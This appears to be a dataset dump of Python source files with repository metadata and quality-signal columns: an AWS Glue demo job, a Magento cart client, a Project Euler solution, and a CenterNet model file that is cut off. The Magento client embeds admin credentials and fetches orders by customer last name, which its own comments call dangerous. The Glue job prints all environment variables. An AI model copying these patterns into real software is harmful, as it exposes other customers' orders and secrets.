Schema (one row per source file):

| Field | Type |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
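Each row pairs a raw source file (`content`) with repository metadata and the numeric quality signals above. A minimal sketch of how such a shard could be inspected, assuming the rows are available as a parquet file readable with pandas (the file name is a placeholder, not the dataset's real layout):

```python
# Minimal sketch: load one shard of this table and peek at a row.
import pandas as pd

df = pd.read_parquet("shard.parquet")   # placeholder path
row = df.iloc[0]
print(row["max_stars_repo_name"], row["size"], row["lang"])
print(row["content"][:200])             # the raw source file
print(row["qsc_code_frac_lines_import_quality_signal"])
```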
**Row 1 · `pfeilbr/aws-glue-playground` · `scripts/python3-shell-job-example.py`**

| field | value |
|---|---|
| hexsha | ee7d13ac1bfb50aa14e3d432688e96e955f612d9 |
| size | 1,615 |
| ext / lang | py / Python |
| repo head hexsha | 52648d527a03e32ae1cc6e2f9fcf418e0875021e |
| licenses | ["MIT"] |
| stars / issues / forks counts and event datetimes | null |

The `max_stars_*`, `max_issues_*`, and `max_forks_*` path, name, head-hexsha, and license fields all carry the same values for this row.

`content`:

```python
import datetime
import time
import boto3
import sys
import os
import importlib

print('sys.argv:\n{}\n\n'.format(sys.argv))
print('os.environ:\n{}\n\n'.format(os.environ))

# only run the following if running in the AWS Glue environment (not available locally)
if 'GLUE_INSTALLATION' in os.environ:
    aws_glue_utils = importlib.import_module('awsglue.utils')
    args = aws_glue_utils.getResolvedOptions(sys.argv,
                                             ['example_argument_0',
                                              'example_argument_1'])
    print('example_argument_0 is {}\n\n'.format(args['example_argument_0']))
    print('example_argument_1 is {}\n\n'.format(args['example_argument_1']))

ts = time.time()
timestamp_string = datetime.datetime.fromtimestamp(
    ts).strftime('%Y-%m-%d_%H.%M.%S')

s3 = boto3.client('s3')
bucket_name = 'aws-glue-playground-01'
bucket_directory = 'tmp'

print('__file__: {}'.format(__file__))
script_file_path = os.path.abspath(__file__)
print('script_file_path: {}'.format(script_file_path))
script_directory_path = os.path.dirname(script_file_path)
print('script_directory_path: {}'.format(script_directory_path))
local_file_path = os.path.abspath(
    '{}/{}-hello.txt'.format(script_directory_path, timestamp_string))
print('local_file_path: {}'.format(local_file_path))
local_file_name = os.path.basename(local_file_path)
print('local_file_name: {}'.format(local_file_name))

open(local_file_path, "w").write('Hello, world!')
key = '{}/{}'.format(bucket_directory, local_file_name)
s3.upload_file(local_file_path, bucket_name, key)
os.remove(local_file_path)
```

| column | value |
|---|---|
| avg_line_length | 33.645833 |
| max_line_length | 82 |
| alphanum_fraction | 0.712693 |
| qsc_code_num_words_quality_signal | 227 |
| qsc_code_num_chars_quality_signal | 1,615 |
| qsc_code_mean_word_length_quality_signal | 4.735683 |
| qsc_code_frac_words_unique_quality_signal | 0.30837 |
| qsc_code_frac_chars_top_2grams_quality_signal | 0.08186 |
| qsc_code_frac_chars_top_3grams_quality_signal | 0.084651 |
| qsc_code_frac_chars_top_4grams_quality_signal | 0.016744 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | 0.093023 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | 0.053953 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | 0.053953 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | 0 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | 0 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | 0 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | 0 |
| qsc_code_frac_chars_digital_quality_signal | 0.009339 |
| qsc_code_frac_chars_whitespace_quality_signal | 0.138081 |
| qsc_code_size_file_byte_quality_signal | 1,615 |
| qsc_code_num_lines_quality_signal | 47 |
| qsc_code_num_chars_line_max_quality_signal | 83 |
| qsc_code_num_chars_line_mean_quality_signal | 34.361702 |
| qsc_code_frac_chars_alphabet_quality_signal | 0.762931 |
| qsc_code_frac_chars_comments_quality_signal | 0.049536 |
| qsc_code_cate_xml_start_quality_signal | 0 |
| qsc_code_frac_lines_dupe_lines_quality_signal | 0 |
| qsc_code_cate_autogen_quality_signal | 0 |
| qsc_code_frac_lines_long_string_quality_signal | 0 |
| qsc_code_frac_chars_string_length_quality_signal | 0.2394 |
| qsc_code_frac_chars_long_word_length_quality_signal | 0.028702 |
| qsc_code_frac_lines_string_concat_quality_signal | 0 |
| qsc_code_cate_encoded_data_quality_signal | 0 |
| qsc_code_frac_chars_hex_words_quality_signal | 0 |
| qsc_code_frac_lines_prompt_comments_quality_signal | 0 |
| qsc_code_frac_lines_assert_quality_signal | 0 |
| qsc_codepython_cate_ast_quality_signal | 1 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | 0 |
| qsc_codepython_cate_var_zero_quality_signal | false |
| qsc_codepython_frac_lines_pass_quality_signal | 0 |
| qsc_codepython_frac_lines_import_quality_signal | 0.2 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | 0 |
| qsc_codepython_score_lines_no_logic_quality_signal | 0.2 |
| qsc_codepython_frac_lines_print_quality_signal | 0.257143 |
| effective | 1 |
| hits | 0 |

All mirrored `qsc_*` columns without the `_quality_signal` suffix are 0 for this row, except `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`, which are null.
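Most of the fraction-style signals can be approximated directly from `content`. The pipeline's exact tokenization and definitions are not given here, so the following re-computation is an assumption-laden sketch, not the reference implementation:

```python
# Approximate a few of the quality signals from a file's raw text.
# NOTE: the real definitions (word splitting, comment detection, ...) are assumptions here.
def approx_signals(content: str) -> dict:
    lines = content.splitlines()
    words = content.split()
    n_chars = max(len(content), 1)
    return {
        "num_lines": len(lines),
        "num_chars": len(content),
        "avg_line_length": len(content) / max(len(lines), 1),
        "max_line_length": max((len(line) for line in lines), default=0),
        "frac_words_unique": len(set(words)) / max(len(words), 1),
        "frac_chars_whitespace": sum(c.isspace() for c in content) / n_chars,
        "frac_lines_import": sum(
            line.lstrip().startswith(("import ", "from ")) for line in lines
        ) / max(len(lines), 1),
    }
```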
**Row 2 · `smileinnovation/snips-magento-skill` · `magentoclient.py`**

| field | value |
|---|---|
| hexsha | ee7f1ffa3ae65649a2137010308390975957d2f4 |
| size | 7,570 |
| ext / lang | py / Python |
| repo head hexsha | c8fe2d1615fce688bcad9258560895a5798c03c2 |
| licenses | ["Apache-2.0"] |
| stars / issues / forks counts and event datetimes | null |

The `max_stars_*`, `max_issues_*`, and `max_forks_*` path, name, head-hexsha, and license fields all carry the same values for this row.

`content`:

```python
import requests
import time

CLIENT_TOKEN_URI = "rest/V1/integration/customer/token"
GET_CART_URI = "rest/default/V1/carts/mine"
GET_CART_ITEM_URI = "rest/default/V1/carts/mine/items"
ADD_TO_CART_URI = "rest/default/V1/carts/mine/items"
ME_URI = "rest/default/V1/customers/me"
DELETE_ITEM_URI = "rest/default/V1/carts/mine/items/{}"

### SHOULD NOT EXIST... FOR DEMO PURPOSES ONLY
ADMIN_TOKEN_URI = "rest/V1/integration/admin/token"
ORDER_URI = "rest/default/V1/orders"
ORDER_SEARCH_CRITERIA = "searchCriteria[filter_groups][0][filters][0][field]=customer_lastname" \
                        "&searchCriteria[filter_groups][0][filters][0][value]={}" \
                        "&searchCriteria[filter_groups][0][filters][0][condition_type]=eq" \
                        "&searchCriteria[sortOrders][0][field]=created_at"


# Magento API call wrapper: catch 401 and try to recover by refreshing the auth token
def __magento_client__(retry_interval=1, max_retry=1, fallback_return=None):
    def decorator(func):
        def wrapper(self, *args, **kwargs):
            retry = 0
            while max_retry == 0 or (max_retry > 0 and retry < max_retry):
                try:
                    return func(self, *args, **kwargs)
                except MagentoClientError as mce:
                    if mce.status_code == 401:
                        self._MagentoClient__get_client_token()
                        time.sleep(retry_interval)
                        retry += 1 if max_retry > 0 else 0
                        continue
            if fallback_return is not None:
                return fallback_return
        return wrapper
    return decorator


class MagentoClientError(Exception):
    def __init__(self, message, status_code):
        super(MagentoClientError, self).__init__(message)
        self.status_code = status_code


class MagentoStockIssueError(Exception):
    def __init__(self, message, status_code, item):
        super(MagentoStockIssueError, self).__init__(message)
        self.status_code = status_code
        self.item = item


class MagentoClient:
    def __init__(self, host, login, password, admin="", admin_password=""):
        self.__host = host
        self.__login = login
        self.__password = password
        ### THIS IS UGLY AND DANGEROUS... A CUSTOM MAGENTO API SHOULD EXIST TO AVOID THIS!!! THIS IS FOR DEMO PURPOSES ONLY!!!
        self.__admin = admin
        self.__admin_password = admin_password
        ### ...........................................
        self.__get_client_token()

    @staticmethod
    def __process_response(response, item=""):
        # Everything ok
        if response.status_code == 200:
            return response.json()
        # Auth error => raise a client error exception with the 401 status code
        elif response.status_code == 401:
            raise MagentoClientError(message=response.json()['message'], status_code=response.status_code)
        # Adding an item to the cart reported a stock issue => raise a Stock exception
        elif response.status_code == 400 and response.json()['message'] and response.json()['message'].encode('utf-8').startswith("We don't have as many"):
            raise MagentoStockIssueError(message=response.json()['message'], status_code=response.status_code, item=item)
        # Any other error => raise a client error exception
        else:
            raise MagentoClientError(message="Something went wrong with Magento: {}".format(response.content), status_code=response.status_code)

    def __build_url(self, uri, query=None):
        if query is None:
            return "{}/{}".format(self.__host.rstrip('/'), uri)
        else:
            return "{}/{}?{}".format(self.__host.rstrip('/'), uri, query)

    def __auth_header(self):
        return {'Authorization': 'Bearer {}'.format(self.__current_token)}

    def __custom_auth_header(self, token):
        return {'Authorization': 'Bearer {}'.format(token)}

    def __get_client_token(self):
        token_response = requests.post(
            url=self.__build_url(CLIENT_TOKEN_URI),
            json={
                'username': self.__login,
                'password': self.__password
            }
        )
        self.__current_token = MagentoClient.__process_response(token_response)

    def __get_customer_lastname(self):
        return MagentoClient.__process_response(requests.get(
            url=self.__build_url(ME_URI),
            headers=self.__auth_header()
        ))['lastname']

    def __get_admin_token(self):
        token_response = requests.post(
            url=self.__build_url(ADMIN_TOKEN_URI),
            json={
                'username': self.__admin,
                'password': self.__admin_password
            }
        )
        return MagentoClient.__process_response(token_response)

    @__magento_client__(max_retry=3, fallback_return=[])
    def get_cart_items(self):
        items_response = MagentoClient.__process_response(requests.get(
            url=self.__build_url(GET_CART_ITEM_URI),
            headers=self.__auth_header()
        ))
        # We capture only the elements we need
        return map(lambda item: (item['sku'], item['qty'], item['name'].encode('utf-8')), items_response)

    @__magento_client__(max_retry=3, fallback_return=0)
    def add_items(self, items):
        # First we need the cart id to be able to insert items into it
        cart_response = requests.get(
            url=self.__build_url(GET_CART_URI),
            headers=self.__auth_header()
        )
        quote_id = MagentoClient.__process_response(cart_response)['id']
        # The item list must be transformed into something Magento can understand
        magento_items = map(lambda i: {'quote_id': quote_id, 'sku': i[2], 'qty': i[1]}, items)
        # I did not find any way to bulk-insert the different items,
        # so I iterate and call the API for each of them
        item_added = 0
        for magento_item in magento_items:
            MagentoClient.__process_response(requests.post(
                url=self.__build_url(ADD_TO_CART_URI),
                headers=self.__auth_header(),
                json={'cartItem': magento_item}
            ), item=magento_item['sku'])
            item_added = item_added + 1
        return item_added

    @__magento_client__(max_retry=3, fallback_return=0)
    def purge_cart(self):
        # First we need the cart's items to be able to delete each of them
        cart_response = requests.get(
            url=self.__build_url(GET_CART_URI),
            headers=self.__auth_header()
        )
        cart = MagentoClient.__process_response(cart_response)
        cart_items = cart['items']

        def remove_item(item_id):
            return requests.delete(
                url=self.__build_url(DELETE_ITEM_URI.format(item_id)),
                headers=self.__auth_header()
            )

        results = map(lambda i: MagentoClient.__process_response(remove_item(i['item_id'])), cart_items)
        return len(results)

    @__magento_client__(max_retry=3, fallback_return=[])
    def get_orders(self):
        customer_lastname = self.__get_customer_lastname()
        admin_token = self.__get_admin_token()
        query_parameters = ORDER_SEARCH_CRITERIA.format(customer_lastname)
        url = self.__build_url(ORDER_URI, query_parameters)
        headers = self.__custom_auth_header(admin_token)
        return MagentoClient.__process_response(requests.get(
            url=url,
            headers=headers
        ))['items']
```

| column | value |
|---|---|
| avg_line_length | 36.926829 |
| max_line_length | 155 |
| alphanum_fraction | 0.634346 |
| qsc_code_num_words_quality_signal | 897 |
| qsc_code_num_chars_quality_signal | 7,570 |
| qsc_code_mean_word_length_quality_signal | 5.004459 |
| qsc_code_frac_words_unique_quality_signal | 0.209588 |
| qsc_code_frac_chars_top_2grams_quality_signal | 0.03787 |
| qsc_code_frac_chars_top_3grams_quality_signal | 0.024059 |
| qsc_code_frac_chars_top_4grams_quality_signal | 0.030074 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | 0.363555 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | 0.278458 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | 0.23591 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | 0.185565 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | 0.138784 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | 0.052573 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | 0 |
| qsc_code_frac_chars_digital_quality_signal | 0.009434 |
| qsc_code_frac_chars_whitespace_quality_signal | 0.25786 |
| qsc_code_size_file_byte_quality_signal | 7,570 |
| qsc_code_num_lines_quality_signal | 204 |
| qsc_code_num_chars_line_max_quality_signal | 156 |
| qsc_code_num_chars_line_mean_quality_signal | 37.107843 |
| qsc_code_frac_chars_alphabet_quality_signal | 0.789605 |
| qsc_code_frac_chars_comments_quality_signal | 0.113078 |
| qsc_code_cate_xml_start_quality_signal | 0 |
| qsc_code_frac_lines_dupe_lines_quality_signal | 0.164286 |
| qsc_code_cate_autogen_quality_signal | 0 |
| qsc_code_frac_lines_long_string_quality_signal | 0 |
| qsc_code_frac_chars_string_length_quality_signal | 0.108436 |
| qsc_code_frac_chars_long_word_length_quality_signal | 0.071194 |
| qsc_code_frac_lines_string_concat_quality_signal | 0 |
| qsc_code_cate_encoded_data_quality_signal | 0 |
| qsc_code_frac_chars_hex_words_quality_signal | 0 |
| qsc_code_frac_lines_prompt_comments_quality_signal | 0 |
| qsc_code_frac_lines_assert_quality_signal | 0 |
| qsc_codepython_cate_ast_quality_signal | 1 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | 0.128571 |
| qsc_codepython_cate_var_zero_quality_signal | false |
| qsc_codepython_frac_lines_pass_quality_signal | 0.035714 |
| qsc_codepython_frac_lines_import_quality_signal | 0.014286 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | 0.028571 |
| qsc_codepython_score_lines_no_logic_quality_signal | 0.278571 |
| qsc_codepython_frac_lines_print_quality_signal | 0 |
| effective | 1 |
| hits | 0 |

All mirrored `qsc_*` columns without the `_quality_signal` suffix are 0 for this row, except `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`, which are null.
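The `__magento_client__` decorator above is a retry-on-401 wrapper: on an auth failure it refreshes the client token and replays the call, and it falls back to a default return value once the retries are exhausted. A stripped-down, self-contained sketch of the same pattern (all names here are invented for illustration):

```python
import time

class ApiError(Exception):
    def __init__(self, status_code):
        super().__init__(status_code)
        self.status_code = status_code

def retry_on_401(retry_interval=1, max_retry=3, fallback_return=None):
    def decorator(func):
        def wrapper(self, *args, **kwargs):
            for _ in range(max_retry):
                try:
                    return func(self, *args, **kwargs)
                except ApiError as e:
                    if e.status_code != 401:
                        raise
                    self.refresh_token()        # re-authenticate, then retry
                    time.sleep(retry_interval)
            return fallback_return
        return wrapper
    return decorator

class Client:
    def __init__(self):
        self.authed = False
    def refresh_token(self):
        self.authed = True
    @retry_on_401(retry_interval=0)
    def get_items(self):
        if not self.authed:
            raise ApiError(401)
        return ["item"]

print(Client().get_items())  # ['item'] after one token refresh
```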
**Row 3 · `CaioTeixeira95/Euler` · `problem_3/problem_3.py`**

| field | value |
|---|---|
| hexsha | ee810690b40aba06e4d511080b16348fc6e69b8a |
| size | 533 |
| ext / lang | py / Python |
| repo head hexsha | 90e98f4110b7e6dc7d36f53eea0b22cf455ac005 |
| licenses | ["MIT"] |
| stars / issues / forks counts and event datetimes | null |

The `max_stars_*`, `max_issues_*`, and `max_forks_*` path, name, head-hexsha, and license fields all carry the same values for this row.

`content`:

```python
import math


# A function to print all prime factors of
# a given number n
def prime_factor(n):
    # divide out all factors of two
    while n % 2 == 0:
        n = n // 2
    # n must be odd at this point,
    # so a step of 2 (i = i + 2) can be used
    for i in range(3, int(math.sqrt(n)) + 1, 2):
        # while i divides n, divide it out
        while n % i == 0:
            n = n // i
    # Condition if n is a prime
    # number greater than 2
    if n > 2:
        print(n)


prime_factor(600851475143)
```

| column | value |
|---|---|
| avg_line_length | 20.5 |
| max_line_length | 49 |
| alphanum_fraction | 0.553471 |
| qsc_code_num_words_quality_signal | 97 |
| qsc_code_num_chars_quality_signal | 533 |
| qsc_code_mean_word_length_quality_signal | 3.020619 |
| qsc_code_frac_words_unique_quality_signal | 0.505155 |
| qsc_code_frac_chars_top_2grams_quality_signal | 0.020478 |
| qsc_code_frac_chars_top_3grams_quality_signal | 0.081911 |
| qsc_code_frac_chars_top_4grams_quality_signal | 0.088737 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | 0 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | 0 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | 0 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | 0 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | 0 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | 0 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | 0 |
| qsc_code_frac_chars_digital_quality_signal | 0.067449 |
| qsc_code_frac_chars_whitespace_quality_signal | 0.360225 |
| qsc_code_size_file_byte_quality_signal | 533 |
| qsc_code_num_lines_quality_signal | 25 |
| qsc_code_num_chars_line_max_quality_signal | 50 |
| qsc_code_num_chars_line_mean_quality_signal | 21.32 |
| qsc_code_frac_chars_alphabet_quality_signal | 0.791789 |
| qsc_code_frac_chars_comments_quality_signal | 0.474672 |
| qsc_code_cate_xml_start_quality_signal | 0 |
| qsc_code_frac_lines_dupe_lines_quality_signal | 0 |
| qsc_code_cate_autogen_quality_signal | 0 |
| qsc_code_frac_lines_long_string_quality_signal | 0 |
| qsc_code_frac_chars_string_length_quality_signal | 0 |
| qsc_code_frac_chars_long_word_length_quality_signal | 0 |
| qsc_code_frac_lines_string_concat_quality_signal | 0 |
| qsc_code_cate_encoded_data_quality_signal | 0 |
| qsc_code_frac_chars_hex_words_quality_signal | 0 |
| qsc_code_frac_lines_prompt_comments_quality_signal | 0 |
| qsc_code_frac_lines_assert_quality_signal | 0 |
| qsc_codepython_cate_ast_quality_signal | 1 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | 0.1 |
| qsc_codepython_cate_var_zero_quality_signal | false |
| qsc_codepython_frac_lines_pass_quality_signal | 0 |
| qsc_codepython_frac_lines_import_quality_signal | 0.1 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | 0 |
| qsc_codepython_score_lines_no_logic_quality_signal | 0.2 |
| qsc_codepython_frac_lines_print_quality_signal | 0.1 |
| effective | 1 |
| hits | 0 |

All mirrored `qsc_*` columns without the `_quality_signal` suffix are 0 for this row, except `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`, which are null.
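Despite its header comment, the script above only prints the last remaining factor, which for Project Euler problem 3 happens to be the answer (the largest prime factor). A variant that returns the full factorization, written here as an illustration rather than taken from the repo:

```python
def prime_factors(n):
    """Return the prime factorization of n as a list, smallest factor first."""
    factors = []
    while n % 2 == 0:
        factors.append(2)
        n //= 2
    i = 3
    while i * i <= n:          # equivalent to i <= sqrt(n), but kept exact
        while n % i == 0:
            factors.append(i)
            n //= i
        i += 2
    if n > 2:                  # whatever remains is itself prime
        factors.append(n)
    return factors

print(prime_factors(600851475143))  # [71, 839, 1471, 6857] -> largest is 6857
```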
**Row 4 · `ZeHuiGong/AFSM` · `ppdet/modeling/architectures/centernet.py`**

| field | value |
|---|---|
| hexsha | ee811e9426fe3dcfed1e5b99abbfc02ac9fd2eea |
| size | 8,038 |
| ext / lang | py / Python |
| repo head hexsha | 54af2f072071779789ba0baa4e4270a1403fd0dd |
| licenses | ["Apache-2.0"] |
| max_stars_count | 27 (events 2020-12-07T10:46:39.000Z to 2021-08-01T08:56:33.000Z) |
| max_issues_count | 4 (events 2020-12-18T08:06:15.000Z to 2021-08-01T02:54:50.000Z) |
| max_forks_count | 4 (events 2020-12-18T04:37:42.000Z to 2020-12-31T02:08:33.000Z) |

The `max_stars_*`, `max_issues_*`, and `max_forks_*` path, name, head-hexsha, and license fields all carry the same values for this row.

`content`:

```python
# AUTHOR: Zehui Gong
# DATE: 2020/6/16

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

from collections import OrderedDict
import copy
from paddle import fluid
from paddle.fluid.param_attr import ParamAttr
from paddle.fluid.initializer import Xavier, Constant
from ppdet.core.workspace import register
import numpy as np
from ppdet.utils.check import check_version
from .cornernet_squeeze import rescale_bboxes
from .input_helper import corner_multiscale_def
from .AdativeFeatureSelection import FeatureFusion, AdaptFeatureFusionV1

__all__ = ['CenterNet']


@register
class CenterNet(object):
    """Args:
        single_scale (bool): whether to use a single-scale feature (e.g., level 3) or
            multi-scale feature fusion (fusing features across various resolutions) to
            predict the final heatmap and size.
    """
    __category__ = 'architecture'
    __inject__ = ['backbone', 'neck', 'head']
    __shared__ = ['num_classes']

    def __init__(self,
                 backbone,
                 neck=None,
                 head='CenterHead',
                 num_classes=80,
                 single_scale=True,
                 spatial_scales=[0.25]):
        check_version('1.8.0')
        super(CenterNet, self).__init__()
        self.backbone = backbone
        self.neck = neck
        self.head = head
        self.num_classes = num_classes
        self.single_scale = single_scale
        self.spatial_scales = spatial_scales

    def extract_feat(self, x):
        body_feats = self.backbone(x)
        if self.neck is not None:
            # the input and output for bifpn are list or tuple
            if self.neck.__class__.__name__ in ['BiFPN']:
                body_feats = tuple(body_feats.values())
                body_feats = self.neck(body_feats)
                body_feats = body_feats[::-1]
            else:
                body_feats, _ = self.neck.get_output(body_feats)
                body_feats = list(body_feats.values())
        else:
            body_feats = list(body_feats.values())
        # feature_fusion = FeatureFusion(self.single_scale, self.spatial_scales)
        feature_fusion = AdaptFeatureFusionV1(spatial_scales=self.spatial_scales,
                                              num_channels=body_feats[0].shape[1])
        body_feats = feature_fusion(body_feats)
        return body_feats

    def build(self, feed_vars, mode='train'):
        im = feed_vars['image']
        body_feats = self.extract_feat(im)
        if mode == 'train':
            target_vars = ['heatmaps', 'reg_mask', 'ind', 'wh', 'regrs']  # heat_weight
            target = {key: feed_vars[key] for key in target_vars}
            self.head.get_output(body_feats)
            loss = self.head.get_loss(target)
            return loss
        elif mode == 'test':
            ratios = feed_vars['ratios']
            borders = feed_vars['borders']
            bboxes, scores, clses = self.head.get_prediction(body_feats[-1])
            bboxes = rescale_bboxes(bboxes, ratios, borders)
            detections = fluid.layers.concat([clses, scores, bboxes], axis=2)
            detections = detections[0]
            return {'bbox': detections}

    def build_multi_scale(self, feed_vars):
        results = {}
        for i, scale in enumerate(self.test_scales):
            im_name = 'image_scale_{}'.format(scale)
            ratio_name = 'ratios_' + im_name
            border_name = 'borders_' + im_name
            # sizes_name = 'sizes_' + im_name
            img = feed_vars[im_name]
            ratios = feed_vars[ratio_name]
            borders = feed_vars[border_name]
            # sizes = feed_vars[sizes_name]
            if self.use_flip:
                im_name_flip = 'image_flip_scale_{}'.format(scale)
                im_flip = feed_vars[im_name_flip]
                img = fluid.layers.concat([img, im_flip], axis=0)
            body_feats = self.extract_feat(img)
            bboxes, scores, clses = self.head.get_prediction(
                body_feats[-1], use_flip=self.use_flip)
            bboxes = rescale_bboxes(bboxes, ratios, borders)
            bboxes = bboxes / scale
            detection = fluid.layers.concat([clses, scores, bboxes], axis=2)
            det_name = 'bbox_scale_{}'.format(scale)
            results[det_name] = detection[0]
        return results

    def _input_check(self, require_fields, feed_vars):
        for var in require_fields:
            assert var in feed_vars, \
                "{} has no {} field".format(feed_vars, var)

    def _inputs_def(self, image_shape, output_size, max_tag_len):
        """output_size: (w, h)"""
        im_shape = [None] + image_shape
        C = self.num_classes
        # yapf: disable
        inputs_def = {
            'image': {'shape': im_shape, 'dtype': 'float32', 'lod_level': 0},
            'im_id': {'shape': [None, 1], 'dtype': 'int64', 'lod_level': 0},
            'gt_bbox': {'shape': [None, 4], 'dtype': 'float32', 'lod_level': 1},
            'gt_class': {'shape': [None, 1], 'dtype': 'int32', 'lod_level': 1},
            'ratios': {'shape': [None, 2], 'dtype': 'float32', 'lod_level': 0},
            'borders': {'shape': [None, 4], 'dtype': 'float32', 'lod_level': 0},
            'sizes': {'shape': [None, 2], 'dtype': 'float32', 'lod_level': 0},
            'heatmaps': {'shape': [None, C, output_size[1], output_size[0]], 'dtype': 'float32', 'lod_level': 0},
            'regrs': {'shape': [None, max_tag_len, 2], 'dtype': 'float32', 'lod_level': 0},
            'reg_mask': {'shape': [None, max_tag_len], 'dtype': 'float32', 'lod_level': 0},
